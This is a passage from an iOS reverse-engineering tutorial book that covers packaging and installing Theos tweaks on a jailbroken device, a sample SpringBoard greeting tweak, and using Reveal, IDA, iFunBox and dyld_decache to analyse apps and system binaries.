lrwxr-xr-x  1 snakeninny   staff   11 Dec  3 09:05 theos -> /opt/theos  
There is a .dylib file in it:  
snakeninnysiMac:iosreproject  snakeninny$  ls -l ./obj 
total 272 
-rw-r--r--  1 snakeninny   staff  33192 Dec  3 11:28 Tweak.xm.b1748661.o  
-rwxr-xr-x  1 snakeninny   staff  98784 Dec  3 11:28 iOSREProject.dylib  

 
62 It’s the core of our tweak.  
•  Package 
Theos uses “make package ” command to pack Theos projects. In fact, “make package ” 
executes “make ” and “ dpkb- deb”  in sequence to finish its job.  
snakeninnysiMac:iosreproject  snakeninny$  make package 
Making all for tweak iOSREProject...  
 Preprocessing  Tweak.xm...  
 Compiling  Tweak.xm...  
 Linking tweak iOSREProject...  
 Stripping  iOSREProject...  
 Signing iOSREProject...  
Making stage for tweak iOSREProject...  
dm.pl: building  package `com.iosre.iosreproject'  in `./com.iosre.iosreproject_0.0.1 -
7_iphoneos -arm.deb'.  
“make  package ” has created a “com.iosre.iosreproject_0.0.1 -7_iphoneos -arm.deb ” file, 
which is ready to be published.  
There is another important function of “make package ” command. After executing this 
command, besides “obj” folder, another “_” folder is also created as shown below.  
snakeninnysiMac:iosreproject  snakeninny$  ls -l 
total 40 
-rw-r--r--  1 snakeninny   staff   262 Dec  3 09:20 Makefile  
-rw-r--r--  1 snakeninny   staff     0 Dec  3 11:28 Tweak.xm  
drwxr-xr-x  4 snakeninny   staff   136 Dec  3 11:35 _ 
-rw-r--r--  1 snakeninny   staff  2396 Dec  3 11:35 com.iosre.iosreproject_0.0.1 -
7_iphoneos -arm.deb 
-rw-r--r--  1 snakeninny   staff   223 Dec  3 09:05 control 
-rw-r--r--@ 1 snakeninny   staff   175 Dec  3 09:48 iOSREProject.plist  
drwxr-xr-x  5 snakeninny   staff   170 Dec  3 11:35 obj 
lrwxr-xr-x  1 snakeninny   staff    11 Dec  3 09:05 theos -> /opt/theos  
What ’s this folder for? Open it, we can see 2 subfolders in it, namely “DEBIAN”  and 
“Library” : 
snakeninnysiMac:iosreproject  snakeninny$  ls -l _ 
total 0 
drwxr-xr-x  3 snakeninny   staff  102 Dec  3 11:35 DEBIAN 
drwxr-xr-x  3 snakeninny   staff  102 Dec  3 11:35 Library 
There is only an edited control file in “DEBIAN” . 
snakeninnysiMac:iosreproject  snakeninny$  ls -l _/DEBIAN  
total 8 
-rw-r--r--  1 snakeninny   staff  245 Dec  3 11:35 control 
The structure of “Library”  directory is shown in figure 3- 11: 
 
63  
Fire 3 - 11 Library directory structure  
If compared with the contents of deb package:  
snakeninnysiMac:iosreproject snakeninny$ dpkg -c com.iosre.iosreproject_0.0.1-
7_iphoneos- arm.deb 
drwxr-xr-x snakeninny/staff   0 2014-12-03 11:35 ./ 
drwxr-xr-x snakeninny/staff   0 2014-12-03 11:35 ./Library/  
drwxr-xr-x snakeninny/staff   0 2014-12-03 11:35 ./Library/MobileSubstrate/  
drwxr-xr-x snakeninny/s taff  0 2014-12-03 
11:35 ./Library/MobileSubstrate/DynamicLibraries/  
-rwxr-xr-x snakeninny/staff  98784 2014-12-03 
11:35 ./Library/MobileSubstrate/DynamicLibraries/iOSREProject.dylib  
-rw-r--r-- snakeninny/staff    175 2014-12-03 
11:35 ./Library/MobileSubstra te/DynamicLibraries/iOSREProject.plist  
And the files of iOSREProject seen in Cydia, as shown in figure 3 -12. 
 
Figure 3- 13 iOSREProject files  
We can see that they have the same directory structures, and you may have already guessed 
that this deb package is simply a combination of “DEBIAN”  which contains debian information, 
and “ Library”  which contains the actual files. In fact, we can also create a “layout ” folder under 
the current project directory before packaging and installing the project on iOS. In this way, all 
files in “ layout ” will be extracted to the same positions of iOS filesy stem (“ layout ” mentioned 

 
64 here acts as root directory, i.e. “/” on iOS), enhancing the functionality of deb packages lot. 
Let’s take an example to see the magic of “layout ”. 
Go back to iOSREProject, input “make clean ” and “ rm *.deb ” in Terminal to restore the 
project to the original state:  
snakeninnysiMac:iosreproject  snakeninny$  make clean 
rm -rf ./obj 
rm -rf "/Users/snakeninny/Code/iosreproject/_"  
snakeninnysiMac:iosreproject  snakeninny$  rm *.deb 
snakeninnysiMac:iosreproject  snakeninny$  ls -l 
total 32 
-rw-r--r--  1 snakeninny   staff  262 Dec  3 09:20 Makefile  
-rw-r--r--  1 snakeninny   staff    0 Dec  3 11:28 Tweak.xm  
-rw-r--r--  1 snakeninny   staff  223 Dec  3 09:05 control 
-rw-r--r--@ 1 snakeninny   staff  175 Dec  3 09:48 iOSREProject.plist  
lrwxr-xr-x  1 snakeninny   staff   11 Dec  3 09:05 theos -> /opt/theos  
Then create a new “layout ” folder: 
snakeninnysiMac:iosreproject snakeninny$ mkdir layout 
And put some random empty files under “layout ”: 
snakeninnysiMac:iosreproject  snakeninny$  touch ./layout/1.tes t 
snakeninnysiMac:iosreproject  snakeninny$  mkdir ./layout/Developer  
snakeninnysiMac:iosreproject  snakeninny$  touch ./layout/Developer/2.test  
snakeninnysiMac:iosreproject  snakeninny$  mkdir -
p ./layout/var/mobile/Library/Preferences  
snakeninnysiMac:iosreproj ect 
snakeninny$  touch ./layout/var/mo bile/Library/Preferences/3.test  
At last, run “make package ” to pack, then copy the deb package to iOS, and install it via 
iFile. Now you can inspect files of iOSREProject in Cydia, as shown in figure 3 -13. 
 
65  
Figure 3-13 Installed files of iOSREProject  
As we can see, all the files except “DEBIAN”  are extracted to the same positions of iOS 
filesystem, all necessary subfolders are also created automatically. There are still many things 
about deb package we didn ’t mention, please refer to http://www.debian.org/doc/debian -
policy for more information. 
•  Installation 
Last but not least, we need to install this deb package on iOS. There are several ways to 
install, but installation through GUI and installation through command line are two of the most typical installation methods. Most of you may think the GUI way is easier, well, let ’s take a look 
at it first.  
2  Install through GUI 
This method is quite easy: First copy the  deb package to iOS via iFunBox, then install it via 
iFile, and reboot iOS. All steps are operated on GUI, but there are too many interactions  
between human and device, we have to switch between PC and iPhone, which leads to 
inconvenience, hence is not sui table for tweak development.  
2  Install through command line. 
This method makes use of very simple ssh commands, which requires OpenSSH to be 

 
66 installed on jailbroken iOS. If you have no idea about what we are talking, go through the 
“OpenSSH ” section in chapter 4 quickly to get some help. Let ’s see how to install through 
command line now.  
First, add your iOS IP to the first line of Makefile:  
export THEOS_DEVICE_IP  = iOSIP 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:8.0  
Then enter “make package install ” to compile, package and install in one click:  
snakeninnysiMac:iosreproject  snakeninny$  make package install 
Making all for tweak iOSREProject...  
 Preprocessing  Tweak.xm...  
 Compiling  Tweak.xm...  
 Linking tweak iOSREProject ... 
 Stripping  iOSREProject...  
 Signing iOSREProject...  
Making stage for tweak iOSREProject...  
dm.pl: building  package `com.iosre.iosreproject:iphoneos -arm' in 
`./com.iosre.iosreproject_0.0.1 -15_iphoneos -arm.deb'  
install.exec  "cat > /tmp/_theos_install.deb ; dpkg -i /tmp/_theos_install.deb  && rm 
/tmp/_theos_install.deb"  < "./com.iosre.iosreproject_0.0.1 -15_iphoneos -arm.deb"  
root@iOSIP's  password:   
Selecting  previously  deselected  package com.iosre.iosreproject.  
(Reading  database  ... 2864 files and directories  currently  installed.)  
Unpacking  com.iosre.iosreproject  (from /tmp/_theos_install.deb)  ... 
Setting up com.iosre.iosreproject  (0.0.1-15) ... 
install.exec  "killall  -9 SpringBoard"  
root@iOSIP's  password:   
Among the above information, Theos has asked for the root password twice. Although it 
seems safe, it ’s inconvenient. Fortunately, we can skip the input of password over and over by 
configuring the authorized_keys on iOS, as follows:  
2  Remove the entry of iOSIP in “/Users/snakeninny/.ssh/known_hosts”. 
Assume  that your iOS IP address is iOSIP. Edit “/Users/snakeninny/.ssh/known_hosts ”, 
and locate the entry of iOSIP:  
iOSIP ssh-rsa 
hXFscxBCVXgqXhwm4PUoUVBFWRrNeG6gVI3Ewm4dqwusoRcyCxZtm5bRiv4bXfkPjsRkWVVfrW3uT52Hhx4RqIuC
OxtWE7tZqc1vVap4HIzUu3mwBuxog7WiFbsbba JY4AagNZmX83Wmvf8li5aYMsuKeNagdJHzJNtjM3vtuskK4jKz
BkNuj0M89TrV4iEmKtI4VEoEmHMYzWwMzExXbyX5NyEg5CRFmA46XeYCbcaY0L90GExXsWMMLA27tA1Vt1ndHrKN
xZttgAw31J90UDnOGlMbWW4M7FEqRWQsWXxfGPk0W7AlA54vaDXllI5CD5nLAu4VkRjPIUBrdH5O1 fqQ3qGkPayh
sym3g0VZeYgU4JAMeFc3  
Delete this entry.  
2  Generate authorized_keys. 
Execute the following commands in Terminal: 
snakeninnysiMac:~  snakeninny$  ssh-keygen -t rsa 
Generating  public/private  rsa key pair. 
 
67 Enter file in which to save the key (/Users/snakeninny/.ssh/id_rsa):   
Enter passphrase  (empty for no passphrase):   
Enter same passphrase  again:  
Your identification  has been saved in /Users/snakeninny/.ssh/id_rsa.  
Your public key has been saved in /Users/snakeninny/.ssh/id_rsa.pub.  
...... 
snakeninnysiMac:~  snakeninny$  cp /Users/snakeninny/.s sh/id_rsa.pub  ~/authorized_keys  
authorized_keys will be generated under users home directory.  
2  Configure iOS 
Execute the following commands in Terminal: 
FunMaker- 5:~ root# ssh-keygen 
Generating public/private rsa key pair. 
Enter file in which to save the key (/var/root/.ssh/id_rsa):   
Enter passphrase  (empty for no passphrase):   
Enter same passphrase  again:  
Your identification  has been saved in /var/root/.ssh/id_rsa.  
Your public key has been saved in /var/root/.ssh/id_rsa.pu b. 
...... 
FunMaker -5:~ root# logout 
Connection  to iOSIP closed. 
snakeninnysiMac:iosreproject  snakeninny$  scp ~/authorized_keys  root@iOSIP:/var/root/.ssh  
The authenticity  of host 'iOSIP (iOSIP)'  can't be established.  
RSA key fingerprint  is 75:98:9a:05:a3:27:2d: 23:08:d3:ee:f4:d1:28:ba:1a.  
Are you sure you want to continue  connecting  (yes/no)?  yes 
Warning:  Permanently  added 'iOSIP' (RSA) to the list of known hosts. 
root@iOSIP's  password:   
authorized_keys                                                                         
100%  408     0.4KB/s   00:00     
ssh into iOS again to see if any passwords are required. Now, “make package install ” 
becomes “one time configuration, one click installation” , yay!  
2  Clean 
Theos provides a convenient command “make clean ” to clean our project. It indeed excutes 
“rm -rf ./obj ” and “ rm -rf “/Users/snakeninny/Code/iosre/_ ”” in turn, thereby removes 
folders generated by “make ” and “ make package ”. Of course, you can further use “rm *.deb ” to 
remove all deb packages generated by “make package ”. 
3.2.4    An example tweak  
The previous sections have introduced Theos almost thoroughly, although not all contents 
are covered, it is way enough for beginners. I have already talked so much about Theos witho ut 
writing a single line of code, but we ’re not done yet.  
Now, I will take a simplest tweak to explain everything we ’ve introduced. After installing 
this tweak, a UIAlertView will popup after each respring.  
 
68 1.   Create tweak project “iOSREGreetings” using Theos 
Use the following commands to create iOSREGreetings project:  
snakeninnysiMac:Code  snakeninny$  /opt/theos/bin/nic.pl  
NIC 2.0 - New Instance  Creator 
------------------------------  
  [1.] iphone/application  
  [2.] iphone/cydget  
  [3.] iphone/framework  
  [4.] iphone/library  
  [5.] iphone/notification_center_widget  
  [6.] iphone/preference_bundle  
  [7.] iphone/sbsettingstoggle  
  [8.] iphone/tool  
  [9.] iphone/tweak  
  [10.] iphone/xpc_service  
Choose a Template  (required):  9 
Project Name (required):  iOSREGreetings  
Package Name [com.yourcompany.iosregreetings]:  com.iosre.iosregreetings  
Author/Maintainer  Name [snakeninny]:  snakeninny  
[iphone/tweak]  MobileSubstrate  Bundle filter [com.apple.springboard]:  
com.apple.springboard  
[iphone/tweak]  List of applications to terminate  upon installation  (space-separated,  '-' 
for none) [SpringBoard]:   
Instantiating  iphone/tweak  in iosregreetings/...  
Done. 
2.   Edit Tweak.xm 
The edited Tweak.xm looks like this:  
%hook SpringBoard  
 
- (void)applicationDidFinishLaunching:(id)ap plication  
{ 
    %orig; 
 
    UIAlertView  *alert = [[UIAlertView  alloc] initWithTitle:@"Come  to 
http://bbs.iosre.com  for more fun!" message:nil  delegate:self  cancelButtonTitle:@"OK"  
otherButtonTitles:nil];  
    [alert show]; 
    [alert release];  
} 
 
%end 
3.   Edit Makefile and control 
The edited Makefile looks like this:  
export THEOS_DEVICE_IP  = iOSIP 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:8.0  
 
include theos/makefiles/common.mk  
 
TWEAK_NAME  = iOSREGreetings  
 
69 iOSREGreetings_FILES  = Tweak.xm  
iOSREGreetings_FRAMEWORKS  = UIKit 
 
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec "killall  -9 SpringBoard"  
The edited control looks like this:  
Package:  com.iosre.iosregreetings  
Name: iOSREGreetings  
Depends:  mobilesubstrate,  firmware  (>= 8.0) 
Version:  1.0 
Architecture:  iphoneos -arm 
Description:  Greetings  from iOSRE! 
Maintainer:  snakeninny  
Author: snakeninny  
Section:  Tweaks 
Homepage:  http://bbs.iosre.com  
This tweak is rather simple. When [SpringBoard applicationDidFinishLaunching:] is called, 
SpringBoard finishes launching. We hook this method, carry out the original implementation 
via %orig, then display a custom UIAlertView. With this tweak, every time we relaunch 
SpringBoard, a UIA lertView pops up. Can you get it?  
If you’ re OK with this section so far, please enter “make package install ” in Terminal. When 
the lock screen shows, you will see the magic as shown in figure 3 -14: 
 
Figure 3-  14 Our first tweak  
Yes, with just some tiny modifications, the behaviors of Apps are changed. Now, iOS is 

 
70 opening its long closed door to us... The common scenarios of Theos and Logos are mostly 
covered in this section, and for a more thorough introduction, please refer to 
http://iphonedevwiki.net/index.php/Theos  and http://iphonedevwiki.net/index.php/Logos.  
Because of Theos, it  has never been easier to modify a closed -source App. As we have 
already mentioned, with the increase of App sizes, class -dump produces a greater amount of 
headers. It has became much more difficult to locate our targets than pure coding. Facing 
thousands line s of code, if there are no other tools to aid our analysis, reverse engineering would 
be a nightmare. Now, it’ s showtime of these auxiliary analysis tools.  
3.3   Reveal  
 
Figure 3- 15 Reveal 
Reveal, as shown in figure 3 -15, is a UI analysis tool by ITTY BITTY, enabling us to see the 
view hierarchy of an App intuitively. The official purpose of Reveal is to “See your application ’s 
view hierarchy at runtime with advanced 2D and 3D visualisations ”, but as reverse engineers, 
seeing our own Apps ’ view hierarchies is obviously not enough, we should be able to see other 
Apps ’ view hierarchies. Figure 3 -16 shows the effect of seeing AppStore ’s view hierarchy using 
Reveal.  

 
71  
Figure 3- 16 See the view hierarchy of AppStore 
On the left side of Reveal, the UI layout of AppStore is presented as a tree, when choosing a 
control object, the corresponding UI element will be marked on the right side of Reveal in real 
time. At the same time, Reveal also parses the class name of this control object, as shown in 
figure 3 -16, the class name of the selected object is SKUIAttributedStringView. To analyze the 
view hierarchies of other ’s Apps, we need to make some configurations in Reveal.  
1.   Install Reveal Loader 
Search and install Reveal Loader in Cydia, as shown in figure 3 -17. 

 
72  
Figure 3- 17 Reveal Loader  
Remarkably, when installing Reveal Loader, it will download a necessary file libReveal.dylib 
from Reveal ’s official website automatically. If the network condition is not good, this file may 
not be downloaded successfully, and Reveal Loader is not fault tolerant to download failures. As 
a result, Cydia may stuck for a long time and stop responding. Therefore, after download 
completes, you ’d better check whether there is  a “RHRevealLoader”  folder under the iOS 
directory “/Library/ ”. 
FunMaker -5:~ root# ls -l /Library/  | grep RHRevealLoader  
drwxr-xr-x  2 root   admin  102 Dec  6 11:10 RHRevealLoader  
If not, create one manually:  
FunMaker- 5:~ root# mkdir /Library/RHRevealLoader 
Then open Reveal, click “Help”  menu, choose “Show Reveal Library in Finder ”, as shown 
in figure 3- 18. 

 
73  
Figure 3-  18 Show Reveal Library in Finder  
Then Finder will pop out just like figure 3 -19. 
 
Figure 3-  19 libReveal.dylib 
Copy libReveal.dylib to the RHRevealLoader folder through scp or iFunBox:  
FunMaker -5:~ root# ls -l /Library/RHRevealLoader  
total 3836 
-rw-r--r-- 1 root admin 3927408 Dec  6 11:10 libReveal.dylib  
By now, the installation of Reveal Loader completes.  
2.   Configure Reveal Loader 
The configuration of Reveal Loader is inside the stock Settings App with the name “Reveal” , 
as shown in figure 3 -20.  

 
74  
Figure 3-  20 Reveal Loader  
Click “Reveal” , some declaration appears as shown in figure 3 -21. 
 
Figure 3- 21 Declaration of Reveal Loader  
Click “Enabled Applications ” to enter the configuration view. Turn on the switch of the App 
you want to analyze. Here we ’ve turned on AppStore and Calculator’ s switches, as shown in 
figure 3 -22. 

 
75  
Figure 3- 22 configuration of Reveal Loader  
That ’s it. The configuration of Reveal Loader is simple and straightforward, isn ’t it? 
3.   Use Reveal to see the view hierarchy of the target App  
Everything is ready, now it ’s the showtime of Reveal. First, one thing should be confirmed 
that OSX and iOS must be in the same LAN, then launch Reveal and relaunch the target App, 
i.e. if the target App is running, you need to terminate it first and run it again. The target App 
can be chosen from top left corner of Reveal. Wait a moment, Reveal will display the view 
hierarchy of the target App, as shown in figure 3 -23.  

 
76  
Figure 3- 23 View hierarchy of Calculator  
Reveal is not complicate and quite user -friendly. But in iOS reverse engineering, analysis on 
UI is not enough, Apps ’ inner implementations under the hood are our final goals. From part 3 
of this book, we will use recursiveDescription function, which is the “command line ” version of 
Reveal, together with Cycript to find the  corresponding code snippets of UI, then you will know 
the real power of iOS reverse engineering.  
3.4   IDA 
3.4.1   Introduction to IDA 
Even if you ’ve never done any iOS reverse engineering before, you may have heard of IDA 
(The Interactive Disassembler), as shown in figure 3 -24. For reverse engineers, IDA is so well-
known that most of our daily work are tightly related to it. If class -dump can help us get the dots 
out of an App, then IDA can connect the dots to form a plane. 

 
77  
Figure 3- 24 Official website of IDA  
Gener ally speaking, IDA is a multi -processor disassembler and debugger fully supporting 
Windows, Linux and Mac OS X. It is so powerful that even the official site cannot give a 
complete function list.  
To be honest, IDA is quite expensive for personal users. But  the author is kind enough to 
offer a free evaluation version, which works well enough for beginners. It is convenient to 
download and install IDA, you can refer to https://www.hex -
rays.com/products/ida/index.shtml  for details.  
3.4.2    Use IDA  
IDA will shortly display an “About ” window after launch, as shown in figure 3 -25. 
 
Figure 3-  25 IDA launch window  
You can click “ OK”  or wait for a few seconds to close the window, after that you will see 
the main screen of IDA, as shown in figure 3 -26. 

 
78  
Figure 3- 26 Main screen of IDA  
In this screen, you don ’t have to search for “ Open File ” in the menu and locate the file to be 
disasse mbled folder by folder, but just drag the target file to the gray zone with the placeholder 
“Drag a file here to disassemble it ”. After opening the file, there is still something to be 
configured, as shown in figure 3 -27. 

 
79  
Figure 3- 27 Initial configurations  
There ’s one thing to mention: For a fat binary (which refers to the binary that contains 
different instruction sets for the purpose of being compatible with different CPU architectures), 
the white frame in figure 3 -27 will list several Mach -O files. I suggest you read table 4 -1 to find 
the ARM type of your device. For example, my iPhone 5 corresponds to ARMv7S. If the ARM 
type of your device is not in the white frame, you should choose the backward compatible one, 
i.e. for ARMv7S devices, cho ose ARMv7S if there is ARMv7S in the list, otherwise choose 
ARMv7. This selection method handles 99% of all cases, if you happen to be the 1%, please come to http://bbs.iosre.com , we’ ll solve the problem together.  
Here,  I’ve chosen ARMv7S, then click “ OK” . Several windows will popup, just click “YES”  
or “OK”  to close them, as shown in figure 3 -28 and 3 -29. 

 
80  
Figure 3- 28 IDA launch option  
 
Figure 3- 29 IDA launch option  
Since we cannot save our configurations in the evaluation version of IDA, checking the box 
“Don’ t display this message again ” doesn’ t work at all, it will still show in the next launch.  
After clicking all the “ OK”  and “ YES”  buttons, the dazzling main screen shows up as in 
figure 3 -30. 

 
81  
Figure 3- 30 IDA main screen  
When entering the screen in figure 3 -30, you will see the progress bar at the top loading, the 
output window at the bottom printing the analysis progress. When the  main color of the 
progress bar changes to blue, and the output window shows the message “The initial 
autoanalysis has been finished ”, it indicates the initial analysis is completed.  
At the beginning stage, IDA is mainly used for static analysis, the outpu t window is quite 
useless, we can close it for now. 
Now that there are two major windows, on the left is “Functions window ” as shown in 
figure 3 -31, on the right is “Main window ” as shown in figure 3 -32. Now, let ’s take a look at 
them one by one.  

 
82  
Figure 3-31 Functions window  
 
Figure 3- 32 Main window  
•  Functions window 
As its name indicates, this window shows all functions (More accurately, Objective -C 
functions should be called methods, but we’ re referring them to functions hereafter), double 
click one function name, the main window will show its implementation. When click “Search ” 
menu of Function Window, a submenu will show up as figure 3- 33. 

 
83  
Figure 3- 33 Search functions  
Choose “Search... ”, then type in what you want to search as shown in figure 3 -34, to search 
for your specified string in all function names. When the string appears in several function 
names, you can click “Search again”  to go through all of them. Of course, all above operation s 
can be done by shortcuts.  
 
Figure 3- 34 Search functions  
The method names in functions window are the same as names exported by class -dump. 
Besides Objective -C methods, IDA lists all subroutines that we cannot get with class -dump. All 
class- dump contents are method names of Objective -C, it’s easy to learn and read for beginners; 
the names of subroutines are just combinations of “sub_”  and addresses, they don ’t have any 
literal meaning, hence are hard to learn and read, freaking many rookies out. However, low-
level iOS is implemented in C and C++, which generate subroutines rather than Objective -C 
methods. In this situation, class- dump is entirely defeated, our only choices are tools like IDA. If 
we want to go deeper into iOS, we must get familiar with IDA.  
•  Main window 
Most iOS developers who have never used IDA before are shocked by the “delirious”  
contents presented by main window. It seems a real mess for all beginners; some of them may 

 
84 close IDA immediately, and never open it again. This perplexed feeling is similar to the first time 
when you write code. In fact, it is like every project needs a main function, in iOS reverse 
engineering, we also need to specify the entry function that we are interested in. Double click 
this entry function in functio n window, main window will show the function body, then select 
main window and press space key, the main window will become much clearer and more readable as shown in figure 3 -35. 
 
Figure 3-  35 Graph view  
There are 2 display modes in main window, i.e. gra ph view and text view, which can be 
switched by space key. Graph view focuses on the logic s; you can use control button and  mouse 
wheel on it to zoom in and out. Graph view provides intuitive visualization of the relationship 
among different subroutines. Execution flows of different subroutines are presented by lines 
with arrows. When there ’s a conditional branch, subroutine t hat meets the condition will be 
connected with green line, otherwise with red line; for an unconditional branch, the next subroutine will be connected with blue line. For example, in figure 3 -36, when the execution 
flow comes to the end of loc_1C758, it ju dges whether R0 is equal to 0, if R0 != 0, the condition 
of BNE is satisfied, it will branch to the right, otherwise it will branch to the left. This is one 
difficult point of IDA; it will be explained again and again in the following examples.  

 
85  
Figure 3-  36 Branches in IDA  
Careful readers may have noticed that the fonts of IDA are colorful. In fact, different colors 
have different meanings, as shown in figure 3 -37. 
 
Figure 3- 37 Color indication bar  
When we choose a symbol, all the same symbols will be hi ghlighted in yellow, making it 
convenient for us to track this symbol, as shown in figure 3 -38. 
 
Figure 3- 38 Symbol highlight  
Double click a symbol to see its implementation as shown in figure 3 -35. Right click a 
symbol to display a menu shown in figure 3 -39. 

 
86  
Figure 3- 39 Right click on a symbol  
Among the menu options, there is a very frequently used function “Jump to xref to 
operand... ” with the shortcut X (meaning “cross” ), click this option, all information explicitly 
cross referenced to this symbol will be displayed as shown in figure 3 -40.  
 
Figure 3-  40 Jump to xref to operand...  
If you think this way is not straightforward and clear enough, yet prefer graph view, you  
can choose option “Xrefs graph to... ”. However, if this symbol is cross -referenced too much, the 

 
87 graph view becomes a mess, just like figure 3 -41 shows.  
 
Figure 3- 41 Xrefs graph to...  
In figure 3 -41, the irregular patterns in black are constructed by lines; lines are melting 
together on both sides. So we know the symbol _objc_msgSendSuper2_stret is cross -referenced 
many times.  
Relatively, if we choose “Xrefs graph from... ” , it will show all symbols cross referenced by 
the symbol you choose, as shown in figure 3 -42. 
 
Figure 3- 42 Xrefs graph from...  
From figure 3 -42 we know that sub_1DC1C is a subroutine, it cross -references 
j__objc_msgSend, _OBJC_CLASS_$_UIApplication and _objc_msgSend explicitly, and 
_objc_msgSend further cross -references __imp__objc_msgSend explicitly. Double click 
_objc_msgSend in main window, then double click __imp__objc_msgSend, you will see it is 
from libobjc.A.dylib, as shown in figure 3 -43. 

 
88  
Figur e 3-43 Tracking the source of external symbols  
In most cases, when we discover an interesting symbol, we want to find every related clue. 
One clumsy but effective way is to select main window and click “Search ” on the menu bar. A 
submenu is shown like figu re 3- 44. 
 
Figure 3- 44 Search in Main window  
Choose “text... ”, a window will popup, as shown in figure 3 -45. 

 
89  
Figure 3- 45 Text search  
There ’re other searching options available, you can check them out according to your 
situations. Then check “Find all occurences ” and click “OK” . IDA will search the whole binary 
and show all the matching strings.  
Graph view provides us with so many features; I ’ve only introduced some common ones, 
proficiency in them ensures deeper research. Graph view is simple and clear , it’s easy to see the 
logics  between different subroutines. As newbies, we mostly use graph view. When using LLDB 
for debugging, we ’ll switch to text view to get the address of a symbol listed on the left side, as 
shown in figure 3 -46. 
 
Figure 3- 46 Text view 
It should be noted that one bug of IDA will cause the incomplete display of a subroutine at 
the end of its graph view (For example, one subroutine has 100 lines of instructions but only 
displays 80 lines). When you are suspicious about instructions in graph view, just switch to text 
view to see whether some code is missing. This bug occurs by very little chance, if you happen to encounter it unfortunately, welcome to http://bbs.iosre.com  for discussion and solution.  

 
90 3.4.3    An analysis example of IDA  
Having introduced so many features of IDA, now I will use a simple example to show the 
real power of IDA. Jailbreak users know, Cydia will suggest us “Restart SpringBoard ” when a 
tweak finishes installation. How does Cydia perform a respring? Please go through section 3.5 
quickly and copy “/System/Library/CoreServices/SpringBoard.app/SpringBoard ” from iOS to 
OSX using iFunBox, then open it with IDA. When the initial analysi s is finished, search 
“relaunchSpringBoard ” in function window, double click it to jump to its function body, as 
shown in figure 3 -47. 
 
Figure 3-  47 [SpringBoard relaunchSpringBoard]  
As we can see in figure 3- 47, this method ’s implementation is simple and clear. According to 
the execution flow from top to bottom, firstly it calls beginIgnoringInteractionEvents to ignore 

 
91 all user interaction events; secondly, it calls hideSpringBoardStatusBar to hide the status bar in 
SpringBoa rd, then it executes two subroutines, they are sub_35D2C and sub_350B8. Now, 
double click sub_35D2C to jump to its implementation, as shown in figure 3 -48. 
 
Figure 3-  48 sub_35D2C  
In figure 3 -48, “ log” appears a lot: First “initialize” , then check whether something is 
“enabled ”, at last “ log” something. From those keywords, we can guess that this subroutine is 
used for logging respring related operations, it has nothing to do with the essential function of 
respring. Click the blue back button of IDA menu bar (as shown in figure 3 -49), or just press 
ESC, to go back to the implementation of “relaunchSpringBoard ” and continue our analysis.  
 
Figure 3- 49 Back button  
Double click sub_350B8 to jump to figure 3 -50. 

 
92  
Figure 3-  50 sub_350B8 
We know from figure 3 -50 that this subroutine is just preparing for calling sub_350C4. 
Double click sub_350C4 to jump to its implementation, you will find the top half of sub_350C4 
looks very similar to sub_35D2C as shown in figure 3 -48, which only does some logging job. But 
what ’s different is that sub_350C4 additionally does something essential , as shown in figure 3- 51. 

 
93  
Figure 3- 51 sub_350C4  
Now that we know little about assembly language, but from the literal meaning of these 
keywords, it can be concluded  that the function of this subroutine is to generate an event named 
“TerminateApplicationGroup ”, specify sub_351F8 to be the handler of it, and then append this 
event to a queue for sequential execution, thus close all Apps by this way. This makes sense: 
Before a mall closes, we need to close all its shops; before respring, we need to close all Apps. 
Let’s go to sub_351F8 to see its implementation, as shown in figure 3 -52. 

 
94  
Figure 3- 52 sub_351F8 
We can infer from the name of 
BKSTerminateApplicationGroupFo rReasonAndReportWithDescription that sub_351F8 acts as a 
terminator, which just proves our analysis of sub_350C4. Go back to the function body of 
relaunchSpringBoard, our analysis comes to the end: _relaunchSpringBoardNow is called to 
finish respring. 
Neit her do we need to read assembly code nor be familiar with calling conventions, we ’ve 
finished this reverse engineering task from scratch, right? However, we should not take much 
credit s, kudos to IDA! In most cases, IDA plays the same role to the above exa mple; you only 
need to be patient reading every line of code, it won ’t be long before you feel the beauty of 
reverse engineering.  
The usage of IDA is much much more complicated than I have introduced in this book, if 
you have any questions about it, please  discuss with us on http://bbs.iosre.com, or take The 
IDA Pro Book as reference. 

 
95 3.5   iFunBox  
 
Figure 3- 53 iFunBox 
iFunBox (as shown in figure 3 -53) is an evergreen iOS file management tool on 
Windows/OSX. In this book, we mainly make use of its file transfer feature. One thing to 
mention is that we must install “ Apple File Conduit 2 ” (or AFC2 for short, as shown in figure 3 -
54) on iOS to browse the entire iOS file system, which is the prerequisite of the following 
operations in this book.  

 
96  
Figure 3- 54 Apple File Conduit 2  
3.6   dyld_decache  
After installing iFunBox and AFC2, most of you would be eager to start browsing the iOS 
filesystem to explore the secrets hidden in iOS. But soon you ’ll discover that there are no library 
files under “/System/Library/Frameworks/ ” or “/System/Library/PrivateFrameworks/ ”. 
What ’s going on?  
From iOS 3.1, many library files including frameworks are combined into a big cache, which 
is located in “/System/Library/Caches/com.apple.dyld/ dyld_shared_cache_armx ” (i.e. 
dyld_shared_cache_armv7, dyld_shared_cache_armv7s or dyld_shared_cache_arm64). We can 
use dyld_decache by KennyTM to extract the separate binaries from this cache, which 
guarantees that the files we analyze are right from iOS, avoiding the possibili ty that static and 
dynamic analysis targets mismatch each other. More about this cache, please refer to DHowett ’s 
blog at http://blog.howett.net/2009/09/cache -or-check/ . 
Before using dyld_decache, please use iFunBox (not scp) to copy 
“/System/Library/Caches/com.apple.dyld/dyld_shared_cache_armx ” from iOS to OSX, then 
download dyld_decache from 
https://github.com/downloads/kennytm/Miscellaneous/dyld_decache[v0.1c].bz2  and grant 
execute permission to the decompressed executable:  

 
97 snakeninnysiMac:~  snakeninny$  chmod +x /path/to/dyld_decache \[v0.1c\] 
Then extract binaries from the cache: 
snakeninnysiMac:~  snakeninny$  /path/to/dyld_decache \[v0.1c\] -o 
/where/to/store/decached/binaries/  /path/to/dyld_shared_cache_armx  
  0/877: Dumping 
'/System/Library/AccessibilityBundles/AXSpeechImplementation.bundle/AXSpeechImplementati
on'... 
  1/877: Dumping 
'/System/Library/AccessibilityBundles/AccessibilitySettingsLoader.bundle/AccessibilitySe
ttingsLoader'...  
  2/877: Dumping 
'/System/Library/AccessibilityBundles/AccountsUI.axbundle/AccountsUI'...  
...... 
All the binaries are extracted into “/where/to/store/decached/binaries/ ”. After that, 
binaries to be reversed are scattered on both iOS and OSX, which leads to inconvenience. So we 
suggest you copy iOS filesystem to OSX with scp, a tool to be introduced in the next chapter.  
